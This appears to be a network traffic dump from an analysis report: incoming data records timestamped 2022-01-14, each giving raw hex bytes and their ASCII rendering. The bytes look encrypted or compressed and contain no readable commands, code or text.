                                                                                                                                                                                                    2022-01-14 03:59:48 UTC793INData Raw: 10 c2 44 82 65 81 dc f2 d3 fd 5c ac 7a c4 ea 66 47 7e 67 bc ac b3 bc c4 08 28 04 30 f2 6e 8b 48 3f c4 aa 46 2a 7d a4 09 5c 28 d1 5e 01 9c 74 bb 76 ea bc 01 51 8f 3b 67 f0 5a 65 27 2e af de 40 0c 3e 5f f3 3e 2c 4e 67 f9 6f 68 f1 91 01 82 6a db ac 05 d3 19 22 a8 6d 37 78 e7 57 a5 8b 85 c1 c0 ef 69 34 cc ca b6 91 02 79 c3 61 50 ea 46 3f b8 d2 61 69 7b 50 96 e9 55 a5 fd 7d 5e b8 2e 18 17 86 8d 93 61 ab ae f2 70 9d 77 6b a2 a2 76 b9 ed 3a e4 1f ef 0b fa 49 6c b5 5a 56 a1 75 26 8e 25 0f 8a 0e 0d cd 5e ad fe fd 6b 5c 7d b1 54 11 73 5a e2 65 ed bc f9 d7 bf f7 da ac ae f0 e1 81 1d 60 f0 be e2 20 19 6b 76 33 6a 07 2b e2 bb 83 da 21 f9 a1 78 88 e9 b1 57 35 4e 92 be 2c 0e bd 74 37 34 1a cc f6 86 c8 c6 ad 16 5c b0 2b ea b6 79 e3 a3 f4 03 9a a0 ea 18 d3 79 b3 64 16 1a
                                                                                                                                                                                                    Data Ascii: De\zfG~g(0nH?F*}\(^tvQ;gZe'.@>_>,Ngohj"m7xWi4yaPF?ai{PU}^.apwkv:IlZVu&%^k\}TsZe` kv3j+!xW5N,t74\+yyd
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC809INData Raw: b5 c0 84 42 f6 a1 5c 36 75 9d 0f e0 34 6a bd e9 aa bb e2 93 77 81 47 20 60 ba 69 5a 33 47 27 8d e2 f2 f9 fc f3 9b 7a 06 67 51 c7 87 fc dc 2f 00 44 fc 97 30 8c be e5 a1 97 98 cb 14 05 db c0 2c dc 0e 84 b7 42 8b ac d7 91 55 ae 16 74 52 e8 70 84 0a 94 dc 99 86 e5 bb 5c a3 ca 36 08 c6 1a a1 e0 9b fa e0 f9 ca ff 0c 58 9e d5 c2 4a 34 89 a7 58 d6 92 c1 8b fb ca 5c 8a 23 e1 8d 9d 8a f4 84 fa 1f 2e 8d 9a 6f 94 43 85 e2 85 d2 e9 99 53 c0 05 f5 06 aa c6 c2 41 16 54 ac af 46 a9 cb 87 e5 7d 2e 4d a3 44 f4 ad 1f d2 ac 15 5c 6a 14 f5 09 10 4c e4 00 76 9a 7a 12 92 3e a9 e6 14 be db be bd 7a 18 6a 93 f9 15 b8 bd c8 f0 d1 03 98 3f e8 a3 07 73 14 de 4c 60 8d 1c cf aa 2e 04 5c c2 16 e9 ef 1c 56 97 66 66 39 ad 66 0e 1b 42 21 20 1e 6b cd 62 b8 52 86 60 83 f1 c1 e2 f5 77 6f ab
                                                                                                                                                                                                    Data Ascii: B\6u4jwG `iZ3G'zgQ/D0,BUtRp\6XJ4X\#.oCSATF}.MD\jLvz>zj?sL`.\Vff9fB! kbR`wo
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC825INData Raw: 14 d7 ec e7 1b 6d f4 75 e7 ff 65 81 52 0b 78 96 98 95 d3 a1 70 6f 60 58 62 3c 51 67 eb b5 de 79 20 16 05 90 5f 23 2e f8 c1 82 a9 5d 2c 1e de 09 fc c0 43 5d 1c dc c9 6b 55 32 8d f0 4a d3 8f 8e 8e 0c 99 2e 6f 24 eb bc 19 c0 cc d7 ca ec fd 2e 31 72 cf 3d 6f 51 54 1e 06 2b fb a4 90 e7 64 9f c6 3d 8a 2e c4 c7 81 10 24 b9 9f 41 ed 3a 3d d2 3a e2 63 d4 1b 56 b9 44 70 0a e3 e8 fa a2 31 9c e4 3c 7d a3 a9 de 5a 7d a5 84 9a bb e9 4a f8 5f f5 91 19 92 e1 5e 49 bf 8f d9 2f 55 71 f2 17 99 58 17 48 3b 5a 70 b3 a1 0b 4d 6a ad 4a 29 7a f3 1a 55 58 e6 79 d7 a1 03 51 62 37 0b 19 cf 14 ca ca 0f 46 ca fa 6e 75 6e 06 ab e4 df a5 e6 99 75 5c e1 cf ff 56 8e e7 e0 3d 31 c2 cd a2 5c f6 b5 04 76 80 9d 19 29 cf d5 ff 54 cd a8 19 0d 16 55 42 2c 43 76 17 a9 c5 f2 4c fe 29 48 19 39 c8
                                                                                                                                                                                                    Data Ascii: mueRxpo`Xb<Qgy _#.],C]kU2J.o$.1r=oQT+d=.$A:=:cVDp1<}Z}J_^I/UqXH;ZpMjJ)zUXyQb7Fnunu\V=1\v)TUB,CvL)H9
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC841INData Raw: 39 3d de 0d 8a 3f 38 9b 38 2a 9f 49 ed 20 78 a0 83 bb 08 d3 2f 52 46 06 53 c1 e0 47 63 df f5 1c 39 45 37 b1 b3 4b 48 ee 5d 07 b1 67 30 3f 61 8a 16 96 dc 90 cd 6a 13 10 70 7f de c0 d1 29 86 cf a3 dc ed 6c 2d 57 d4 35 99 21 c0 fd d5 d7 60 7c 58 a3 dd 61 ac fb f1 a3 ee db 47 bb f6 f8 61 c2 a0 54 c1 55 44 9f 3a 0f 94 3b 60 0f f3 d5 0e 40 a7 e0 42 d1 61 55 49 a2 6d e6 36 d3 92 2f e2 c9 28 dd 4a ba b7 2f f0 69 cd 29 a8 c9 64 b0 72 7c 80 6b a9 b6 e3 39 48 82 60 a2 dc 3a 63 ce 5c 0b 0d 13 b5 f6 f1 1b 3a 3d e5 71 4e ae 14 bb 3b 80 ec 4e b8 27 3f 45 a5 b6 c9 32 25 94 bf eb 14 63 3e f9 b6 f7 28 84 b2 dc f2 72 5b 0d 2e 4b 59 3b db 99 4b f2 8c c7 9d 36 ed 4a 98 c8 aa 64 99 45 dd 0d be 2f 18 09 3a b7 86 17 e8 be 38 b1 b1 ad 19 ae 5e 77 3f 96 6b 24 68 5b 81 15 6d d9 46
                                                                                                                                                                                                    Data Ascii: 9=?88*I x/RFSGc9E7KH]g0?ajp)l-W5!`|XaGaTUD:;`@BaUIm6/(J/i)dr|k9H`:c\:=qN;N'?E2%c>(r[.KY;K6JdE/:8^w?k$h[mF
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC857INData Raw: 51 3c 26 2c a9 bc e4 b4 fd df e3 9a 39 1b 84 ed b2 01 20 be 8c 81 ad 56 72 09 8f 70 94 f1 12 e2 40 6b c6 6b f2 b4 f8 93 22 49 83 3f e8 dc 33 78 9b 43 a2 89 c3 b2 a9 79 72 1e d1 30 95 1c ec 13 2f 7c 14 34 45 8e 67 e7 42 6d 14 73 dd dd 70 d4 d3 50 70 bc 5e d6 55 b3 c2 df 00 bb c7 58 42 79 5d c6 8a 38 7c ce 6e 0c 4a 01 81 82 5b b8 3c 3d ef 23 4f 09 32 a8 34 44 17 1e ef e7 73 b7 b5 13 25 42 f1 ec 0f 74 68 7e 7c 2e ba 5f 52 a0 27 37 91 d1 37 59 09 b5 1a bf be ad 3f fb 48 c4 bd da 54 e5 e3 c2 49 cb 1a 17 ea 22 b1 88 ae c9 4f 30 3b 5f 1a 58 bd f1 87 cb bf 52 a9 10 f1 f2 ce ec a5 f1 0c 9c 77 73 e4 a4 be 5f 73 4e cd 37 b1 f8 46 b4 1f 17 02 41 d8 67 77 de 51 58 99 d1 03 df ce 89 02 d2 38 c0 2d 09 9d b1 ef e8 46 88 ab 1f 81 3a 5c 49 9c f0 8a 77 94 6e 96 67 0f 7d a0
                                                                                                                                                                                                    Data Ascii: Q<&,9 Vrp@kk"I?3xCyr0/|4EgBmspPp^UXBy]8|nJ[<=#O24Ds%Bth~|._R'77Y?HTI"O0;_XRws_sN7FAgwQX8-F:\Iwng}
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC873INData Raw: 6e bc db 3d cd 3a 99 7b 02 03 4c 5e 74 2a 9a aa 3d fd c3 b1 7f ac 32 ab a9 29 11 2c e3 c6 f2 f7 ad ed b5 ab 31 e9 7d f4 33 27 c8 78 1b 19 26 d0 18 66 cd ac cf 23 81 ef ca 5a 54 15 15 95 bb 34 86 1d 89 3a 61 c4 f7 dc cd b7 8e c6 38 a6 f1 28 46 dc b7 d0 ba 52 03 01 e3 e1 26 ac 80 4d 04 53 75 83 65 d5 d4 e1 22 12 a6 24 5b 2e b1 e8 2d ac 1a d1 1c 58 5a 92 da 9f 9c 79 6c 48 54 5c 02 32 56 15 5b ce ba 5b e3 4a cd 56 d0 c6 59 18 ee 8b 38 9b 12 03 3f 6f 21 9d c2 b8 cb 08 33 d2 60 d8 e6 ca ef 0f 94 d5 4e af 0b 32 09 56 84 65 8e 50 db f5 66 10 b9 25 e5 4e 4b 5c dc 5b 53 94 72 6a cf c2 6d 29 05 3e 75 31 ec ee a5 61 d0 2b 7a 00 1b 9a 3f a6 82 a3 ad 55 5e b6 a5 d8 a3 68 9b 7d 33 db 3a 0b e1 a3 bc ce 25 63 ba d2 4b 80 de 08 cd 3a 3f 11 d4 96 5e 84 6a f4 db 86 27 c8 bd
                                                                                                                                                                                                    Data Ascii: n=:{L^t*=2),1}3'x&f#ZT4:a8(FR&MSue"$[.-XZylHT\2V[[JVY8?o!3`N2VePf%NK\[Srjm)>u1a+z?U^h}3:%cK:?^j'
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC889INData Raw: 1c 34 22 b3 4e f4 53 de 8a 21 a5 96 1c e0 a5 4f bb 36 ce bc 27 34 11 6e 66 08 2b dd a4 08 af 10 2c 03 0f 2a db b7 e3 6a 14 da 31 d2 81 15 a6 9d 7a 2f da 3d 5d 4a 50 ba ab 52 1b 59 a5 04 07 41 3b a5 cb 10 0a d3 a9 64 a5 4b 30 6b 06 53 ff 2a ee 6d f4 34 c3 07 c0 ca 4e 14 6e 1e 87 6d 81 84 2a 9d c3 a1 77 ee a9 f0 f5 ad ed 8f 40 d4 33 8d 20 f7 d2 2a 7f 0a c8 72 c1 45 13 43 51 bb b0 04 f4 df 24 82 81 90 66 73 59 53 5a aa 88 41 f4 97 87 04 b9 75 e4 85 6f ec 64 7d 14 2f 37 68 4a ce 7b 31 c8 70 a0 3d 5f 0b f8 ed 8f e0 79 58 40 8e fc 55 ef be 95 34 16 80 17 a8 13 a5 8b 92 c6 7d 75 cb 4c 50 e1 8e dc bc b2 87 c5 a7 41 3f 68 34 23 23 56 02 03 f1 ef d5 7e 84 98 0b 18 6a 23 af 4c 3a b5 07 2d 9c bc 72 ea 2b 14 bd 22 a4 72 e0 da 6a c9 6c 99 38 8b 1f bc 67 2d 07 bf 1d fa
                                                                                                                                                                                                    Data Ascii: 4"NS!O6'4nf+,*j1z/=]JPRYA;dK0kS*m4Nnm*w@3 *rECQ$fsYSZAuod}/7hJ{1p=_yX@U4}uLPA?h4##V~j#L:-r+"rjl8g-
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC905INData Raw: 0a 19 0b 51 35 f2 6c 47 56 51 0d bc 16 4a 73 34 9b 8f b3 7c 0e e8 57 d3 cf 5e 89 78 79 88 41 ad 40 d5 81 fa 20 85 99 2f 2e 3b 4c f6 7f dd c6 5b 1a 01 31 f9 98 85 ff 5f 54 cc 0c f8 1a 2a a6 0c 9b 04 8d 89 28 36 ea 00 f8 6a 43 fe 50 b2 79 60 c3 b0 df 9a a1 b4 25 4f b3 a2 83 aa 70 6d 55 72 1c 75 0e ef 5b 41 6d b6 ec 79 df 98 50 44 57 c6 19 27 fe 40 39 37 38 65 91 67 df 30 60 f2 9b ce 98 bd d6 db b5 73 d3 e1 17 ab 13 a0 f8 d2 1e c0 e2 68 c4 c3 a6 a3 4b d0 6b cd bf 19 04 06 8e 61 ad 4a 89 b1 1a dd 84 a6 5c cb fe 3e 24 bd ec b3 11 a5 de 55 bd 7e 80 13 5f bb e4 43 94 45 b1 92 f6 e0 89 fd 8e 82 fb a7 1d 46 76 6e cf dd 5f d2 e8 ba a8 23 d8 b7 d2 1d 08 09 7c cd d3 ca 40 78 7b 62 70 f8 c8 e0 7c e0 35 c2 38 8b df 87 19 a5 bc ee f5 f0 6d e8 29 dd e5 4c 0c b6 9a 74 cb
                                                                                                                                                                                                    Data Ascii: Q5lGVQJs4|W^xyA@ /.;L[1_T*(6jCPy`%OpmUru[AmyPDW'@978eg0`shKkaJ\>$U~_CEFvn_#|@x{bp|58m)Lt
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC921INData Raw: b1 0b 1a d9 13 76 4e b4 5c cc e6 99 41 c1 d9 32 d3 72 1e 67 77 46 0e 15 32 06 ed f6 af 7e e5 77 c1 08 0a 1f 02 fb 79 cc 44 82 80 47 8b 80 2b d6 7c c7 6d 53 d6 09 38 fd fc a0 cf 12 9f 52 9f c3 c0 48 0a d9 c9 68 d6 ff 86 9c 30 ec 69 df e8 72 cc 39 00 16 b0 6e 45 fb 65 b5 f2 31 9c d3 28 00 e0 7d bc 3a 57 e7 b9 a7 9f 80 89 7f b6 6d 9d e7 b7 a8 64 92 f8 a2 b5 d5 d2 7c e4 51 2c 51 54 fb 01 73 03 dc 37 1e cc f4 7e ff b1 7d 2b f7 d9 71 1c 92 57 11 ac a6 6b da c1 ae c2 11 e8 03 d4 52 60 e1 18 b2 91 41 6d f4 f7 48 82 3c 4b f3 ce d3 52 c5 15 ce 42 c7 58 9d 2d 06 6b f6 62 24 38 cb aa ac fa af 98 b4 d9 d7 59 6c c7 f0 81 1a 72 5c 57 fa 60 39 77 3d 56 87 90 d3 ff 5d a2 e4 2f e7 d2 2d f6 11 84 33 af ea fb 84 27 ff f7 e2 78 cc 50 fe ca d6 3e 80 13 38 18 4b 65 20 f9 55 1c
                                                                                                                                                                                                    Data Ascii: vN\A2rgwF2~wyDG+|mS8RHh0ir9nEe1(}:Wmd|Q,QTs7~}+qWkR`AmH<KRBX-kb$8Ylr\W`9w=V]/-3'xP>8Ke U
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC937INData Raw: 6d b7 c2 92 0d 3b 78 31 82 c5 63 65 7e 66 d9 47 85 3d 4d 08 34 29 74 36 0a 1b a1 4d 36 bf c1 b0 93 b3 d5 fb f3 d2 a7 a5 6b 1c 2e 7b bf cd a2 e6 2d af 4e 0d b2 a8 fd 77 ae dc 91 3c f6 49 9f 13 cd 0a d9 cb bd 6d 50 38 9b 2a f6 59 30 c1 14 ab df b6 44 e6 f9 5a ad f3 8f d5 a2 26 3b a1 6d dc 00 15 4f dc 9d de 5d 09 8e 4b e8 78 96 f2 67 6b 15 da 7d b1 37 04 0b c8 7a 4c 03 90 0c 22 25 50 a0 6f 29 92 da 4c 0b 18 1d 31 ca 21 85 80 e5 46 0e 50 fb cb 9e 22 40 73 df 9e 65 f0 cf 68 4e 38 24 71 93 a8 55 78 46 b3 44 4c fa d8 2e a0 3b e6 a3 99 c7 a4 c4 c0 9c d5 13 a6 d4 61 29 49 f7 1b 57 ba 2b 2b 45 da a0 cf aa 7c d7 24 38 55 e9 5a fa 73 14 f8 83 3e c2 1e d9 2b 0d a9 be 27 3d 23 70 a0 8c 8f ab 8d 73 88 22 dd cb 64 86 66 2a 1e 6b a2 06 f6 10 89 3d 7f 0e 9f 93 de da 98 1f
                                                                                                                                                                                                    Data Ascii: m;x1ce~fG=M4)t6M6k.{-Nw<ImP8*Y0DZ&;mO]Kxgk}7zL"%Po)L1!FP"@sehN8$qUxFDL.;a)IW++E|$8UZs>+'=#ps"df*k=
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC953INData Raw: ef 18 64 c8 48 50 8e fb 9f 9b e2 46 3d 9d f7 b3 d1 11 56 1d dd df 0f 28 83 f2 31 61 c0 81 a7 93 06 37 26 85 40 0b bc c9 5a 2d 8b 57 f5 77 8c cd 1b 51 61 a0 f2 64 82 da a0 48 7b 8d dd 3e 9f e7 27 ae 64 26 34 55 a3 da b6 cf 5d bc 0f b5 01 24 b1 5b c3 60 52 7f 83 7a 03 c9 49 f5 42 76 37 0f 82 98 65 42 17 43 78 79 7a 7e 7a ce 83 8f e2 55 fd 2d 02 74 c2 0e 27 6f a1 eb b3 d6 49 e9 d0 1a 3a 99 1d c8 16 6a f3 bf 7c 0c 29 9c 45 39 21 57 47 4d 5f 72 2b 0f 69 62 af 17 8d 08 cc 92 73 52 b1 7d e0 ec f7 34 a7 6e 52 8b 3d 68 b9 b7 ea b0 94 e6 5a 50 55 78 c4 f9 17 f3 71 e5 4c 47 14 e2 e4 b7 79 e1 61 ef 2a 17 a6 c2 97 f1 00 30 a1 8b a9 22 a4 99 c9 22 ed 7c 3f 1e 5e 95 c7 b4 dd 54 b1 6f 38 ad 75 42 89 5e 90 ca 00 67 a1 26 6a 0e 7d bb e8 f9 ad 18 c2 56 82 28 c4 32 a6 e0 d4
                                                                                                                                                                                                    Data Ascii: dHPF=V(1a7&@Z-WwQadH{>'d&4U]$[`RzIBv7eBCxyz~zU-t'oI:j|)E9!WGM_r+ibsR}4nR=hZPUxqLGya*0""|?^To8uB^g&j}V(2
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC969INData Raw: d2 5b 99 d3 14 35 0b 4e 6c 9d 32 e4 ed 7e ee 53 ba 60 9f c6 c0 01 b9 19 bc cc b1 86 4a 06 6d a3 8a 03 90 43 55 f4 10 bc aa 9f db 86 9f 4e e9 e8 f6 63 97 7b 9d a4 93 1c ae b8 d4 6a 41 e1 b3 d2 d9 13 27 ad d0 ae 55 f8 f0 4c 7a 01 0b e9 6f 76 42 80 97 72 a7 f1 8f 3b a3 3f 99 de 04 6c 18 5b 48 4e bf 12 9a 4b e4 04 df aa c9 83 d7 98 89 b7 20 55 59 25 52 35 dd e0 a3 55 1a aa 93 80 88 00 de 9f d1 bf 85 3c b3 64 74 7a 66 e1 f9 ac 7f 85 cd 01 57 0c 34 72 a4 d8 33 58 22 88 23 59 1c e7 4f 77 2b 26 ce 59 a0 c4 52 26 fa 4c a9 12 26 09 f8 71 c6 8a 63 3f 88 fa 20 2d c9 cc b2 64 cd 58 1a fc 3e 87 a9 4c df 80 a9 25 10 4e 03 5b 59 3e 51 5e 57 1a fd da d0 17 84 21 76 5b 73 ab 99 f5 51 51 03 31 00 c9 bb 58 c8 f5 83 d8 84 3a 02 b5 2e 4f 23 65 47 17 3b 08 40 9a 4e 82 bc f4 12
                                                                                                                                                                                                    Data Ascii: [5Nl2~S`JmCUNc{jA'ULzovBr;?l[HNK UY%R5U<dtzfW4r3X"#YOw+&YR&L&qc? -dX>L%N[Y>Q^W!v[sQQ1X:.O#eG;@N
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC985INData Raw: 40 5a dd ea 68 9b 7c 68 93 65 28 61 03 39 c8 85 65 f8 cd 95 8f 9a 0e 94 1e b2 b0 40 ed 0b ff 57 6a e9 21 3d 1d ab cc 69 ff 23 56 b2 dc b1 34 6f ea 07 b5 a5 34 6b d0 b1 56 e0 54 e6 8d c7 d9 9b 15 d0 31 84 d2 05 84 91 2f 9b 7f d5 68 d7 98 59 3f 7d e4 52 08 6d 6a 86 d4 95 65 11 57 85 9c 07 77 32 9a 2f 26 52 52 0a 95 a7 a2 d8 53 5b 84 95 d2 ae 9f 81 0a 1b 46 b0 6c ce a0 11 5c 1b c3 87 f0 7f 67 bd b7 5d 7c fc ab e2 23 71 a7 2d 70 4c 1b 0b f4 f0 2d e4 7d 4c c7 6e 95 67 38 3a ac c0 f0 2d 8c 8d 3f 4d 39 5e 4f 47 7a d7 8b 30 87 3d de 2e f2 c7 67 d8 9b 25 6e 0b 5a 76 67 07 2f 31 d9 8a 57 65 02 ed 54 c0 82 f8 38 a2 67 4d 66 42 b5 55 d0 d5 d2 0f 0a 94 76 fb ed aa db 30 2c a6 87 5c 75 09 24 87 07 c3 a0 f3 6e 11 7a 23 ed 79 9c fe f7 e4 76 15 a7 eb b4 23 bf 0f 3f 93 54
                                                                                                                                                                                                    Data Ascii: @Zh|he(a9e@Wj!=i#V4o4kVT1/hY?}RmjeWw2/&RRS[Fl\g]|#q-pL-}Lng8:-?M9^OGz0=.g%nZvg/1WeT8gMfBUv0,\u$nz#yv#?T
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1001INData Raw: 24 2d b7 15 f6 75 cb e7 a9 16 83 ff 62 0e 02 d2 7d b4 56 f4 19 de 0b 90 c8 20 54 c2 a5 05 f2 14 ac d1 c2 21 ef 5b fa 01 31 62 e0 63 65 7f 8d cf 53 b2 00 6e 0b ae e1 2d 9f 6c 1c f2 e8 db cd 5b b3 dc 32 c0 3a ca cd a8 cd 41 a6 ef c3 32 08 38 ca 3d 54 9e 20 bb c7 69 89 68 70 e9 e5 3b d6 87 34 c6 04 e9 b4 cf fa fe 54 5b bc 23 71 7a 4f 90 ca ba 0b fb aa 6e 21 be 8a a5 b8 6a e5 d7 2b 4a 59 e1 ff bf db 29 4f 61 5f 52 53 2b fb 31 7f 20 47 91 e0 a2 79 0f 3a b7 d1 d6 0a da 4f 65 62 60 71 e5 d4 cd 97 92 5d f7 d4 39 87 8e 93 bf a4 94 c2 ba 0f 38 c9 28 e1 46 3d 17 ae a0 8e 29 bd 8e 68 13 a0 1c 89 ba e4 e6 dc 3f 57 06 99 e8 9f 7c 92 ee a1 4e 0a 15 4e 48 71 1d 9e d6 5b f2 bb fc 19 e6 6a 50 97 3d c6 eb 3d e6 57 ce 8e b3 a3 b5 e8 73 a7 bb b2 6a 42 2c 4b 0f 27 b8 dc 7d 37
                                                                                                                                                                                                    Data Ascii: $-ub}V T![1bceSn-l[2:A28=T ihp;4T[#qzOn!j+JY)Oa_RS+1 Gy:Oeb`q]98(F=)h?W|NNHq[jP==WsjB,K'}7
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1017INData Raw: 7e 5f 8e 21 59 c5 0c de b6 05 0d 5d 4b 79 68 14 11 b3 bd cd 55 df 5e bb 5c ea 01 5f 63 cf c1 1c 6b e0 95 a5 e1 34 e5 51 4b fa da 7f 94 d7 1b a1 6b 49 cc d7 09 70 03 5e bf 15 69 21 ff 50 2e 4e 40 da fc 90 54 e7 21 2c cc 04 4f 05 a6 66 9f ac 8a d5 57 60 bb fb c3 43 06 c3 cd b2 54 1c 3c 2b 42 b0 dc 63 8b 14 c5 02 45 4e 5a e2 d0 74 b5 aa 8f 81 08 3e 1b 0e 80 9c 71 3b ee dc a3 d4 2f ad 06 6b 9c 23 88 05 73 56 e7 fb 32 73 6e 02 45 d0 af a5 ff 47 ef 55 b3 2e 97 a5 1a c7 0a e4 65 f7 01 ba 6c ab 4e 74 12 24 af e1 d7 99 8f 27 65 73 8a 20 ac 6c f7 62 67 51 d2 5c 40 0f de 6e ca c4 bd cb c8 83 6e 15 24 f4 ee d7 fc 31 b8 85 43 5e 40 81 35 db 4e c1 72 b5 6d ce 7b 02 9e 60 bf e1 c7 51 33 18 a2 0c 0e fd 9e 98 13 c1 fd 73 de 7f 4e 53 78 db bc 4d fc 02 6e 49 8d 7f ff ac 3a
                                                                                                                                                                                                    Data Ascii: ~_!Y]KyhU^\_ck4QKkIp^i!P.N@T!,OfW`CT<+BcENZt>q;/k#sV2snEGU.elNt$'es lbgQ\@nn$1C^@5Nrm{`Q3sNSxMnI:
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1033INData Raw: ef 66 51 08 e2 a6 51 41 d4 d2 6f e2 ab 6e 7a b3 ea 59 ef 8b b9 13 e8 17 a0 45 c0 d3 a9 7a 53 f7 d6 dc 80 7c 8b 49 57 9e a0 8b ce 5f 1a 6e 2a ac a8 2a d8 b8 a9 cd b0 1a ca cf b4 e2 1e 87 10 f1 66 05 f5 44 0b d8 42 c3 72 95 73 f5 73 e4 d4 7e 71 f1 4c 55 26 98 42 b7 cb 46 06 3a 52 5a 14 57 fe cf aa 53 99 eb ef d3 7d e3 d8 56 9f f0 46 cd 3c 25 c1 50 1a c8 84 c1 0e 0e 09 84 a4 ed dc 27 f3 86 3c 6f a9 9f cd e7 6b 7d b3 98 d7 83 4e 30 3e 1a 39 06 67 30 05 39 8f 26 56 38 c6 c7 5a 31 34 4b a8 3d ae 41 2e 61 df 00 37 a9 9b 58 61 ec 17 eb be 68 a8 89 05 e9 60 ee 5d 35 69 95 20 0c 03 d0 01 11 ac 2f e3 68 91 f5 13 4a 65 85 e7 6a 50 02 6c 4d 0f 6b 42 e5 4f 8c b0 c3 23 78 3e 19 bd 5e 2e c6 5b 18 f5 04 96 b3 1b 34 81 1a 82 7e 23 2d 8c 69 01 a0 0b c1 43 0a b2 f7 70 b5 1f
                                                                                                                                                                                                    Data Ascii: fQQAonzYEzS|IW_n**fDBrss~qLU&BF:RZWS}VF<%P'<ok}N0>9g09&V8Z14K=A.a7Xah`]5i /hJejPlMkBO#x>^.[4~#-iCp
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1049INData Raw: e0 8b a9 99 f8 a2 c3 06 84 0f 07 2d 5f 15 22 30 2d 51 3b d0 84 56 7f 2d e4 80 ac 4d cb 39 00 c4 2f e8 86 ca 3e 16 b2 ae 9e 88 8f 36 ac 15 31 0d 6e ed f4 3e b6 c2 a1 c0 7e 92 d1 f4 2a 55 68 b6 0a f8 3b c7 31 e5 ef 9f 46 07 fc 22 47 8d f1 10 fd ad 26 90 1c 1e fc a1 00 a7 84 89 39 8f 97 c7 8b 3d 49 bb 6f 78 16 8d f2 3e 71 e4 17 3b 10 ee fc 46 f1 5d e5 c7 e0 e5 11 7e cf 67 18 c0 91 d5 94 91 ab fc 94 f8 c4 06 d1 d8 da 19 e6 4c c0 1e 69 ea 2a 3d b0 d2 d8 e0 87 d2 25 65 0b ef 6b 28 3d 16 c5 c9 3c 42 05 66 c8 a1 b4 de 6c 7e 3f c8 25 06 32 18 af a3 c9 3d 19 da 94 0a ae 35 50 dc 54 8a 7f a2 1c d7 9e 5d 58 40 ad a9 45 92 5d 7d ce 70 09 50 0a 23 52 73 aa 3e ba 93 3f af ca cc 81 98 02 59 62 36 33 59 91 49 cd 8a a4 38 cc d4 1d ba 84 0d 53 7e ac f1 d6 40 d3 1a 07 07 56
                                                                                                                                                                                                    Data Ascii: -_"0-Q;V-M9/>61n>~*Uh;1F"G&9=Iox>q;F]~gLi*=%ek(=<Bfl~?%2=5PT]X@E]}pP#Rs>?Yb63YI8S~@V
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1065INData Raw: 19 6c 19 04 05 3e 35 9b c9 27 56 47 15 e5 08 bd dc 9d f6 70 ed 12 c7 49 0b eb 7c 47 e0 31 55 69 78 ee e2 26 58 94 b3 48 d4 ce af 01 df 66 03 0a 6c 84 e0 89 9a 68 71 b6 24 57 8e 5a 52 2f 46 51 7a 11 da 9c 08 8f 18 b1 bb 1a f2 d9 1b 05 df ff 50 7e 5c 80 59 35 0b f8 82 ac 55 d9 73 5d 1d 18 be 6f 92 33 70 44 20 f5 52 41 1e a2 c8 cd ae 94 91 dd 94 96 b3 8c 2a cc 26 b9 88 22 91 d1 86 36 84 d0 c1 7a 98 0e 4c 8f cd 37 33 18 96 3b 5e 6f 7c c6 d8 77 52 59 64 a8 3e fd 07 66 62 6e cd 11 b3 f4 2b 3f 2b 95 79 56 0c 57 25 a6 d0 92 35 74 b8 f6 e7 44 ec ae 96 96 28 72 b5 3c 53 69 9e 38 22 dd 9c 83 30 2d 73 b7 53 9a b8 ec 33 32 41 e5 ec a7 63 9e 15 89 50 a9 99 56 42 90 df 62 b6 de 19 a4 c9 a0 8e c6 7b cd 06 b3 32 da f9 0a 16 ba 1b 6e b9 23 17 09 64 c6 56 17 40 dc 7b 65 be
                                                                                                                                                                                                    Data Ascii: l>5'VGpI|G1Uix&XHflhq$WZR/FQzP~\Y5Us]o3pD RA*&"6zL73;^o|wRYd>fbn+?+yVW%5tD(r<Si8"0-sS32AcPVBb{2n#dV@{e
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1081INData Raw: 06 4e f1 4c 81 eb d6 05 94 a6 50 e6 35 7b 89 bc 0d a5 75 19 aa bd 44 e3 e0 6e 54 b6 bc 12 2a 85 3c 07 95 f1 1d 52 8f c7 ea 28 ed 5f ad 41 ac 46 49 92 e5 e7 e9 c5 14 ff 2e 6b 8e 5d 36 25 4d 2d 75 c3 3f 4e a0 c6 f3 f3 19 58 ee 2e d5 c9 b5 5b 16 02 53 3a 24 56 a5 1b a5 76 ce e3 2e 46 6e 25 69 7b b9 ec f7 6e d6 1b bf 22 00 63 13 5e 22 c9 7f 1f 17 a1 75 49 7f 6c 64 7e 09 40 fc 7a 2a 9e fb db 54 d4 56 54 c5 23 56 54 2b ae 37 e6 3a 60 8d eb 6b 89 e1 69 4c 2d ae 24 16 7a aa 60 58 39 01 c0 fe 4e 64 32 77 da 48 d0 d6 7d d8 79 57 02 a1 bb 6e aa c9 b5 13 2b b0 86 e9 e1 48 cb aa c4 96 0a 45 b6 17 24 27 77 cc e5 43 41 a6 60 cc d1 7b 0f c2 ab 2a b4 34 ca 37 93 c3 28 45 e4 3c 98 84 ee 02 c4 7f 5a 5e 5e 84 2d 15 c5 29 56 1b c3 11 b2 36 71 57 a2 44 ae 8e 2a dd 8c aa c6 ac
                                                                                                                                                                                                    Data Ascii: NLP5{uDnT*<R(_AFI.k]6%M-u?NX.[S:$Vv.Fn%i{n"c^"uIld~@z*TVT#VT+7:`kiL-$z`X9Nd2wH}yWn+HE$'wCA`{*47(E<Z^^-)V6qWD*
